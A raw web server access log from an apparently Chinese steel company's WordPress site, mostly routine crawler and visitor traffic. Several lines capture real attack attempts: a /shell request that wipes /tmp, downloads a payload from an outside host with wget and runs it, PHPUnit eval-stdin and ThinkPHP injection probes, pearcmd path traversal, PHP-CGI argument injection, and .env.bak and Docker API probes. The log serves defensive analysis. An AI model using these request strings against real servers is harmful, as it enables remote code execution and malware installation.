144.76.33.48 - - [05/Aug/2025:09:53:06 +0800] "GET /portfolio-category/dual-phase-steel/ HTTP/1.1" 200 17758 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.33.48 - - [05/Aug/2025:09:53:15 +0800] "GET /portfolio/%E5%86%B7%E8%BD%A7%E6%9D%BF/ HTTP/1.1" 200 18720 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.33.48 - - [05/Aug/2025:09:53:49 +0800] "GET /portfolio-category/hot-dip-galvanized-coil/ HTTP/1.1" 200 17763 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
193.34.212.110 - - [05/Aug/2025:10:05:46 +0800] "GET / HTTP/1.1" 200 33395 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
89.213.174.230 - - [05/Aug/2025:10:07:09 +0800] "POST /boaform/admin/formLogin HTTP/1.1" 404 9423 "http://36.133.115.36:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
144.172.110.50 - - [05/Aug/2025:10:27:25 +0800] "GET / HTTP/1.0" 200 109870 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
8.219.133.204 - - [05/Aug/2025:10:38:28 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1" 499 0 "-" "Hello, world"
36.133.115.36 - - [05/Aug/2025:10:38:29 +0800] "POST /wp-cron.php?doing_wp_cron=1754361509.1990370750427246093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.96.5 - - [05/Aug/2025:10:38:32 +0800] "GET / HTTP/1.1" 200 33395 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
52.180.146.145 - - [05/Aug/2025:10:48:24 +0800] "GET /developmentserver/metadatauploader HTTP/1.1" 404 9423 "-" "Mozilla/5.0 zgrab/0.x"
149.50.103.48 - - [05/Aug/2025:10:51:36 +0800] "GET / HTTP/1.1" 200 33395 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
91.224.92.17 - - [05/Aug/2025:10:58:14 +0800] "GET / HTTP/1.1" 200 152149 "-" "-"
36.133.108.125 - - [05/Aug/2025:11:03:07 +0800] "HEAD /login.asp HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"
52.167.144.179 - - [05/Aug/2025:11:10:21 +0800] "GET /portfolio/%E5%86%B7%E8%BD%A7%E6%9D%BF/ HTTP/1.1" 200 18720 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
193.34.212.110 - - [05/Aug/2025:11:11:24 +0800] "GET / HTTP/1.1" 200 33396 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
149.86.227.127 - - [05/Aug/2025:11:37:54 +0800] "GET / HTTP/1.1" 200 33396 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
36.133.115.36 - - [05/Aug/2025:11:40:22 +0800] "POST /wp-cron.php?doing_wp_cron=1754365222.3765709400177001953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [05/Aug/2025:11:40:23 +0800] "GET / HTTP/1.1" 200 152149 "-" "-"
20.120.134.34 - - [05/Aug/2025:11:42:31 +0800] "GET /logistics/ HTTP/1.1" 200 73746 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0"
149.50.103.48 - - [05/Aug/2025:11:56:06 +0800] "GET / HTTP/1.1" 200 33397 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
216.126.238.175 - - [05/Aug/2025:11:59:38 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 32838 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:38 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:39 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:40 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:41 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:42 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:42 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:43 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:43 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:44 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:45 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:46 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:46 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:47 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:48 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:49 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:49 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:50 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:51 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:51 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:52 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:52 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:53 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:53 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:54 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:55 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:55 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:56 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:57 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:57 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:58 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:59 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:11:59:59 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:12:00:00 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:12:00:01 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:12:00:01 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:12:00:02 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:12:00:02 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:12:00:04 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 65680 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:12:00:05 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:12:00:07 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 152149 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:12:00:08 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 152149 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:12:00:09 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "Custom-AsyncHttpClient"
216.126.238.175 - - [05/Aug/2025:12:00:11 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "Custom-AsyncHttpClient"
43.157.172.39 - - [05/Aug/2025:12:02:33 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.157.172.39 - - [05/Aug/2025:12:02:36 +0800] "GET / HTTP/1.1" 200 33395 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.130.40.120 - - [05/Aug/2025:12:09:48 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.130.40.120 - - [05/Aug/2025:12:09:50 +0800] "GET / HTTP/1.1" 200 33395 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
193.34.212.110 - - [05/Aug/2025:12:16:44 +0800] "GET / HTTP/1.1" 200 33396 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
91.196.152.231 - - [05/Aug/2025:12:32:15 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
141.98.11.20 - - [05/Aug/2025:12:32:41 +0800] "GET / HTTP/1.1" 200 152149 "-" "Mozilla/5.0"
36.133.115.36 - - [05/Aug/2025:12:39:00 +0800] "POST /wp-cron.php?doing_wp_cron=1754368740.4531419277191162109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.196.152.42 - - [05/Aug/2025:12:39:01 +0800] "GET / HTTP/1.1" 200 152149 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
196.251.69.145 - - [05/Aug/2025:12:45:06 +0800] "GET / HTTP/1.1" 200 152149 "-" "-"
149.50.103.48 - - [05/Aug/2025:12:58:24 +0800] "GET / HTTP/1.1" 200 33395 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
128.199.8.140 - - [05/Aug/2025:13:00:29 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
128.199.8.140 - - [05/Aug/2025:13:00:31 +0800] "GET / HTTP/1.1" 200 33396 "http://36.133.115.36" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
36.133.108.119 - - [05/Aug/2025:13:00:49 +0800] "HEAD /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/%3C?echo(md5(%22hi%22));?%3E+/tmp/index1.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
193.34.212.110 - - [05/Aug/2025:13:15:11 +0800] "GET / HTTP/1.1" 200 33396 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
149.50.96.5 - - [05/Aug/2025:13:15:14 +0800] "GET /userRpmNatDebugRpm26525557/start_art.html HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
193.34.212.157 - - [05/Aug/2025:13:21:14 +0800] "GET /goform/qpalfhyd HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
193.34.212.157 - - [05/Aug/2025:13:21:15 +0800] "GET /goform/qpalfhyd HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
91.230.168.205 - - [05/Aug/2025:13:33:46 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
122.51.97.132 - - [05/Aug/2025:13:36:42 +0800] "GET /version HTTP/1.1" 499 0 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1"
122.51.97.132 - - [05/Aug/2025:13:36:42 +0800] "GET /containers/json HTTP/1.1" 499 0 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1"
122.51.97.132 - - [05/Aug/2025:13:36:43 +0800] "GET / HTTP/1.1" 499 0 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1"
122.51.97.132 - - [05/Aug/2025:13:36:43 +0800] "GET /.env.bak HTTP/1.1" 499 0 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [05/Aug/2025:13:40:58 +0800] "POST /wp-cron.php?doing_wp_cron=1754372458.7837910652160644531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
195.184.76.83 - - [05/Aug/2025:13:40:59 +0800] "GET / HTTP/1.1" 200 152149 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
149.50.96.114 - - [05/Aug/2025:13:41:34 +0800] "GET / HTTP/1.1" 200 33396 "-" "Mozilla/5.0"
149.50.103.48 - - [05/Aug/2025:14:05:30 +0800] "GET / HTTP/1.1" 200 33396 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.34.212.110 - - [05/Aug/2025:14:16:50 +0800] "GET / HTTP/1.1" 200 33396 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
149.86.227.127 - - [05/Aug/2025:14:35:46 +0800] "GET / HTTP/1.1" 200 33396 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
36.133.115.36 - - [05/Aug/2025:14:52:50 +0800] "POST /wp-cron.php?doing_wp_cron=1754376770.7465341091156005859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
119.178.208.178 - - [05/Aug/2025:14:52:51 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 33396 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.69"
61.157.189.99 - - [05/Aug/2025:14:52:57 +0800] "GET http://www.cqqizhou.com/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.7"
61.157.189.99 - - [05/Aug/2025:14:52:58 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 33396 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.7"
118.89.233.234 - - [05/Aug/2025:14:59:35 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.153.79.218 - - [05/Aug/2025:15:04:44 +0800] "GET / HTTP/1.1" 200 33397 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
223.108.79.102 - - [05/Aug/2025:15:07:19 +0800] "GET / HTTP/1.1" 200 33396 "-" "Mozilla/5.0 (Linux; Android 10; MI 9 Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.198 Mobile Safari/537.36 MMWEBID/1234 MicroMessenger/8.0.1.1841(0x2800015D) WeChat/arm64"
223.108.79.102 - - [05/Aug/2025:15:07:21 +0800] "GET / HTTP/1.1" 200 33396 "-" "Mozilla/5.0 (Linux; Android 13; 23049RAD8C Build/TKQ1.221114.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/115.0.0.0 Mobile Safari/537.36 MicroMessenger/8.0.45"
223.108.79.102 - - [05/Aug/2025:15:07:21 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "https://servicewechat.com/" "Mozilla/5.0 (Linux; Android 13; 23049RAD8C Build/TKQ1.221114.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/115.0.0.0 Mobile Safari/537.36 MicroMessenger/8.0.45"
223.108.79.102 - - [05/Aug/2025:15:07:23 +0800] "GET /wp-content/uploads/2025/07/1753456723-%E5%8F%8C%E7%9B%B8%E9%92%A2roduct_Single600.webp HTTP/1.1" 200 22790 "https://servicewechat.com/" "Mozilla/5.0 (Linux; Android 13; 23049RAD8C Build/TKQ1.221114.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/115.0.0.0 Mobile Safari/537.36 MicroMessenger/8.0.45"
223.108.79.102 - - [05/Aug/2025:15:07:23 +0800] "GET /wp-content/uploads/2025/07/1753453127-%E4%BD%99%E5%8D%B7product_Single600%C3%97284.webp HTTP/1.1" 200 18744 "https://servicewechat.com/" "Mozilla/5.0 (Linux; Android 13; 23049RAD8C Build/TKQ1.221114.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/115.0.0.0 Mobile Safari/537.36 MicroMessenger/8.0.45"
223.108.79.102 - - [05/Aug/2025:15:07:23 +0800] "GET /wp-content/uploads/2025/07/1753453096-%E5%8F%8C%E7%9B%B8%E9%92%A2product_Single600%C3%97284.webp HTTP/1.1" 200 14562 "https://servicewechat.com/" "Mozilla/5.0 (Linux; Android 13; 23049RAD8C Build/TKQ1.221114.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/115.0.0.0 Mobile Safari/537.36 MicroMessenger/8.0.45"
223.108.79.102 - - [05/Aug/2025:15:07:23 +0800] "GET /wp-content/uploads/2025/07/1753456770-%E7%83%AD%E9%95%80%E9%94%8C%E5%8D%B7product_Single600.webp HTTP/1.1" 200 27502 "https://servicewechat.com/" "Mozilla/5.0 (Linux; Android 13; 23049RAD8C Build/TKQ1.221114.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/115.0.0.0 Mobile Safari/537.36 MicroMessenger/8.0.45"
223.108.79.102 - - [05/Aug/2025:15:07:23 +0800] "GET /wp-content/uploads/revslider/slider-1/1750929639-yuanjing_Slider_3840%C3%972160_20250626171955-scaled.webp HTTP/1.1" 200 203290 "https://servicewechat.com/" "Mozilla/5.0 (Linux; Android 13; 23049RAD8C Build/TKQ1.221114.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/115.0.0.0 Mobile Safari/537.36 MicroMessenger/8.0.45"
223.108.79.102 - - [05/Aug/2025:15:07:23 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled-50x100.webp HTTP/1.1" 200 1660 "https://servicewechat.com/" "Mozilla/5.0 (Linux; Android 13; 23049RAD8C Build/TKQ1.221114.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/115.0.0.0 Mobile Safari/537.36 MicroMessenger/8.0.45"
223.108.79.102 - - [05/Aug/2025:15:07:23 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "https://servicewechat.com/" "Mozilla/5.0 (Linux; Android 13; 23049RAD8C Build/TKQ1.221114.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/115.0.0.0 Mobile Safari/537.36 MicroMessenger/8.0.45"
223.108.79.102 - - [05/Aug/2025:15:07:24 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=3 HTTP/1.1" 200 2292 "https://servicewechat.com/" "Mozilla/5.0 (Linux; Android 13; 23049RAD8C Build/TKQ1.221114.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/115.0.0.0 Mobile Safari/537.36 MicroMessenger/8.0.45"
223.108.79.102 - - [05/Aug/2025:15:07:24 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=2 HTTP/1.1" 200 2058 "https://servicewechat.com/" "Mozilla/5.0 (Linux; Android 13; 23049RAD8C Build/TKQ1.221114.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/115.0.0.0 Mobile Safari/537.36 MicroMessenger/8.0.45"
223.108.79.102 - - [05/Aug/2025:15:07:24 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled.webp HTTP/1.1" 200 141034 "https://servicewechat.com/" "Mozilla/5.0 (Linux; Android 13; 23049RAD8C Build/TKQ1.221114.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/115.0.0.0 Mobile Safari/537.36 MicroMessenger/8.0.45"
223.108.79.102 - - [05/Aug/2025:15:07:24 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled.webp HTTP/1.1" 200 197360 "https://servicewechat.com/" "Mozilla/5.0 (Linux; Android 13; 23049RAD8C Build/TKQ1.221114.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/115.0.0.0 Mobile Safari/537.36 MicroMessenger/8.0.45"
149.50.103.48 - - [05/Aug/2025:15:09:06 +0800] "GET / HTTP/1.1" 200 33396 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
93.158.90.36 - - [05/Aug/2025:15:15:43 +0800] "GET /robots.txt HTTP/1.1" 200 119 "-" "Mozilla/5.0 (Android 14; Mobile; rv:123.0) Gecko/123.0 Firefox/123"
93.158.90.35 - - [05/Aug/2025:15:15:45 +0800] "GET / HTTP/1.1" 200 33397 "-" "Mozilla/5.0 (Android 14; Mobile; rv:123.0) Gecko/123.0 Firefox/123"
43.157.22.109 - - [05/Aug/2025:15:16:37 +0800] "GET / HTTP/1.1" 200 33397 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
35.233.254.198 - - [05/Aug/2025:15:26:28 +0800] "HEAD /wordpress HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.233.254.198 - - [05/Aug/2025:15:26:28 +0800] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
